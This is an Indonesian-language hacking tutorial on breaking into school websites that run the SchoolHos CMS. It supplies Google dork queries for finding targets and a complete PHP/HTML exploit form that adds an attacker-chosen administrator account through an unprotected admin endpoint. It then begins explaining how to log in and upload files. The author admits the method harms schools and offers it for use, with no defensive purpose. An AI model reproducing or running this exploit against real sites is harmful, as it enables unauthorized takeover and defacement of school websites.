Tutorial Hacking Web Sekolah Dengan CMS Schoolhos

Kali ini kita akan bahas Tutorial Hack / Retas / Deface Web Sekolah dengan CMS SchoolHosCara ini Mungkin ga pantut di contoh hihi Karena dapat merugikan pihak sekolahdari pada lama ikuti aja tutor nya di bawah ini..

Exploit ini sangat mudah digunakan :)
Google Dork:

inurl:/?p=bukutamu
intext:Schoolhos Free Open Source CMS

Code :
<?php

$self = $_SERVER["PHP_SELF"];

echo 'Target';
echo "<form action=\"$self\" method=\"GET\"><input type=\"text\" name=\"url\"><input type=\"submit\"></form>";
if(!isset($_GET['url'])){
$url = "http://target.com/adminpanel/database/admin.php";
}else
{
$url = $_GET['url'];
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>!!Barrabravaz Everywhere!!</title>
</head>
<body>

<h1>!!Barrabravaz Everywhere!!</h1>
<?php echo "Target is : $url"; ?>

<form id="target" method="post" action="<?php echo "$url"; ?>/adminpanel/aplikasi/database/admin.php?pilih=admin&untukdi=tambah">

Isi username yang mau di isi <INPUT type="text" name="username" value="barrabravaz"><br>
Pass nya<INPUT type="text" name="password" value="barrabravaz"><br>

<input type="submit" name="insert" value="Insert" >
</form>
</body>
</html>

...
Teks yang berwarna hijau : Jangan ganti Title ya =) hormati yang buat ;)

Teks yang berwarna kuning : ganti User & Pass nya dengan user&pass kamu :)

simpan file nya di notepad dan simpan dengan nama file extension .php

cara menggunakannya..

Isi target : www.target.sch.id

lalu isi username & Password kamu..

selanjutnya klik insert,dan otomatis akan dialihkan ke halaman /adminpanel/

tinggal login ,masukin user&pass nya :)
....

....
sekarang cara upload file nya gan hehehe ( siapa tau gak tau caranya mau upload diamana )

Pertama, login dulu di Adminpanel .
Seperti pada gambar berikut :

Setelah itu anda akan dihadapkan pada Menu Dashboard , dimana di Menu tsb adalah bagian terpenting di website CMS SCHOOLHOS karena penataan/pengaturan ada disitu :)
Pilih File Materi seperti pada gambar dibawah ,